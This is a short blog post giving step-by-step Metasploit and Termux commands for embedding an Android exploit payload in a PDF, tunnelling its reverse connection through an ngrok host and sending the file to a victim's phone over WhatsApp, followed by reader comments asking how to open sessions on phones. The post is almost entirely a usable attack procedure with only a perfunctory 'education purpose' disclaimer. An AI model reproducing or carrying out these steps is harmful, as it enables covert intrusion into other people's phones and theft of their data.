binding payloads in PDF file Metasploit Termux.. Android Hacking... not for beginners..

Ads

binding payloads in PDF file Metasploit Termux.. Android Hacking... not for beginners..

Prerequisite..

1.ngrok for WAN attacks

2.metasploit (pre-installed)

metasploit payload bind in PDF file
1.cd metasploit-framework
2. ./msfconsole (wait for few minutes)

3.open new terminal window



4.cd metasploit-framework
5.cd modules
6.cd exploits
7.cd android
8.cd fileformat
9. now copy this file name you need this format for next step adobe_reader_pdf_js_interface.rb
10.back to the first terminal

11.use exploit/android/fileformat/adobe_reader_pdf_js_interface.rb
12.now open an other terminal window ./ngrok tcp 1649



13.now copy the link "0.tcp.ngrok.io" that's are lhost for WAN but dh not copy my link you get an other link in ngrok
14. now back to the first window set lhost 0.tcp.ngrok.io
15. now copy port /0.tcp.ngrok 19238 you will get another port number...
16.set lport 15836



17.exploit
18 copy this /data/data/com.termux/files/home/.msf4/local/msf.pdf /sdcard your payload will be save in your internal mobile storage.. now send it to the victims mobile via whatsapp.. I'm not responsible for any misuse of this script.. only use for education purpose..

6 تعليقات

if you have doubts let me know...

  1. hi. good contribution

    ردحذف
  2. Payload was created but how can I listen to that payload please help.

    ردحذف
  3. Is it need root permission
    I cant move it into storage

    ردحذف
  4. How do I start a session for looking into phone

    ردحذف
  5. That msf.pdf not located in the root as mentioned above

    ردحذف
  6. very nice artical
    please visit my blog
    https://kidscricketcoaching.blogspot.com/2020/05/episode-16-back-foot-drive-29052020.html

    ردحذف

إرسال تعليق

if you have doubts let me know...

أحدث أقدم